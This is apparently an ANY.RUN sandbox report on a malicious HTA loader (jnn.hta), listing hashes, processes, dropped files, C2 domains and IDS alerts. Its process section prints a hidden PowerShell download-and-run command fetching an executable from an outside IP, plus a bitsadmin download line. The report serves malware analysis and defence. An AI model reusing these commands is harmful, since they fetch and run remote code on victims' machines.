analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

jnn.hta

Full analysis: https://app.any.run/tasks/eb48ca2b-468e-4722-9e40-5b04796f96ff
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: March 14, 2019, 11:27:22
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
opendir
autoit
Indicators:
MIME: text/html
File info: HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
MD5:

A6D6CDC59C6507424B2AEDEFF46AFD2B

SHA1:

3D9D1169A822D2C17BA8E8F1E42794246AEA8958

SHA256:

BD6B52E1365E898CF42A2AE281E897884C440BD33140A264F90E34D4AAE3330A

SSDEEP:

48:ZKpON1CTY1zH1aKL2slzhapoeddogoioFxBZoWk0uynk3nKpON1CTY1zH1aKL2s2:ZBvaY1zUMdzBZweoBvaY1zUMdzBZwjP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses BITADMIN.EXE for downloading application

      • mshta.exe (PID: 3484)
    • Executes PowerShell scripts

      • mshta.exe (PID: 3484)
    • Application was dropped or rewritten from another process

      • Hmmmm.exe (PID: 3144)
      • mdo.exe (PID: 2740)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3036)
    • Downloads executable files from IP

      • powershell.exe (PID: 3036)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3036)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3036)
      • Hmmmm.exe (PID: 3144)
    • Drop AutoIt3 executable file

      • Hmmmm.exe (PID: 3144)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 3484)
    • Dropped object may contain Bitcoin addresses

      • Hmmmm.exe (PID: 3144)
      • mdo.exe (PID: 2740)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.txt | Text - UTF-8 encoded (100)

EXIF

HTML

ContentType: text/html; charset=utf-8
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
5
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start mshta.exe no specs bitsadmin.exe no specs powershell.exe hmmmm.exe mdo.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3484"C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Local\Temp\jnn.hta"C:\Windows\System32\mshta.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2604"C:\Windows\System32\bitsadmin.exe" /transfer myFile /download /priority normal Your Binded File Direct URL C:\Users\admin\AppData\Local\Temp\text.rtfC:\Windows\System32\bitsadmin.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
2147942487
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
3036"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://141.136.44.78/jnn/jnn.exe','C:\Users\admin\AppData\Local\Temp\Hmmmm.exe');Start-Process C:\Users\admin\AppData\Local\Temp\Hmmmm.exe;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3144"C:\Users\admin\AppData\Local\Temp\Hmmmm.exe" C:\Users\admin\AppData\Local\Temp\Hmmmm.exe
powershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2740"C:\Users\admin\AppData\Local\Temp\88127361\mdo.exe" seg=muu C:\Users\admin\AppData\Local\Temp\88127361\mdo.exeHmmmm.exe
User:
admin
Company:
AutoIt Team
Integrity Level:
MEDIUM
Description:
AutoIt v3 Script
Version:
3, 3, 14, 5
Total events
1 026
Read events
947
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
54
Unknown types
0

Dropped files

PID
Process
Filename
Type
3036powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1RONFJ4LCO6QOWSVIXYO.temp
MD5:
SHA256:
3036powershell.exeC:\Users\admin\AppData\Local\Temp\Hmmmm.exeexecutable
MD5:22CF84A2FD381A3E383E65C933553FE1
SHA256:F62A182A1B4BD3F05AD0A639B3C5333990A6721DAE6715CA6863E5E97D03A6E8
3484mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\error[1]text
MD5:35FE91C2AC1BA0913CC617622B9EB43F
SHA256:966240C0527B20E8E2553B7E5A68594AE69230AA00186F2C6C2C342405494837
3144Hmmmm.exeC:\Users\admin\AppData\Local\Temp\88127361\bum.pdftext
MD5:FEAEEA7208F7A411E4CDC0E3286A11DB
SHA256:1DF03709F122F14E2606E94BCCB74B47C6C48A483C68A45ED446C06C0CA01965
3036powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0586DB8FF5249AD980CEC7BF2CBC3708
SHA256:DF93E043BDFAB9E6C36B353985E621A7A276756B52877AACDC5F36517009B4E2
3144Hmmmm.exeC:\Users\admin\AppData\Local\Temp\88127361\nkq.docxtext
MD5:51C9B23E003E3E14F4659BC60D4BE131
SHA256:3ADC7F290017EB28AA34E8CEC227E781E25D180C3EB77E03B01211369980E0B6
3484mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\error[1]html
MD5:16AA7C3BEBF9C1B84C9EE07666E3207F
SHA256:7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
3036powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1add71.TMPbinary
MD5:0586DB8FF5249AD980CEC7BF2CBC3708
SHA256:DF93E043BDFAB9E6C36B353985E621A7A276756B52877AACDC5F36517009B4E2
3144Hmmmm.exeC:\Users\admin\AppData\Local\Temp\88127361\seg=muutext
MD5:451111D03BCA3331E4D1F2631F56C494
SHA256:98EC9A9A42575A0626EBFFAF344487E26118EBCA0D837D218CFC4DC446F37102
3144Hmmmm.exeC:\Users\admin\AppData\Local\Temp\88127361\lpr.mp4text
MD5:3576B5978B68394D98E25AFFD7225B83
SHA256:E182A17F5A6B486FF9410ECCCBF9685BC5C54CF2EC314AE255040DABCE04E895
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
18
DNS requests
17
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3036
powershell.exe
GET
200
141.136.44.78:80
http://141.136.44.78/jnn/jnn.exe
LT
executable
905 Kb
suspicious
GET
200
141.136.44.78:80
http://141.136.44.78/jnn/jnn.exe
LT
executable
905 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
8.8.4.4:53
Google Inc.
US
whitelisted
141.136.44.78:80
Vardas.lt, Uab
LT
suspicious
185.163.45.48:58887
kgentle77.duckdns.org
MivoCloud SRL
MD
suspicious
3036
powershell.exe
141.136.44.78:80
Vardas.lt, Uab
LT
suspicious
8.8.8.8:53
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
kgentle777.hopto.org
unknown
kgentle77.duckdns.org
  • 185.163.45.48
malicious

Threats

PID
Process
Class
Message
3036
powershell.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
3036
powershell.exe
Potentially Bad Traffic
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
3036
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3036
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3036
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
Potentially Bad Traffic
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
No debug info